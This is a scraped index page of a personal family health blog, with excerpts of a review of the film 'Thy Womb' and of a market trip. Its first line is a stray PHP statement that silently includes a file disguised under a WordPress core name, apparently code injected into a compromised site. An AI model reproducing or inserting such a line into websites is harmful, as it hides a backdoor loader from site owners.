@include(ABSPATH . WPINC .'/class-wp-xmlrpc.php'); My Family Health Blog - Page 9 of 248 - Committed Family Healer's Research

Thy Womb Movie Review: Of Course They are Pro-Life!

Watch out for spoilers!  I will be mentioning spoilers from the film… so if you do not want spoilers, stop reading right now. My wife and I visited Tawi Tawi a very long time ago in 1995 just to see the solar eclipse then.  We were just in and...

Pre-Christmas Food Shopping at the Malabon Wet Market

Yesterday morning I decided it was a good idea to go shopping at a different location.  Try the Malabon City wet market for a refreshing change.  My objective was 2 fold: 1. To get horse meat, as this was the only reliable place where they sold horse meat every...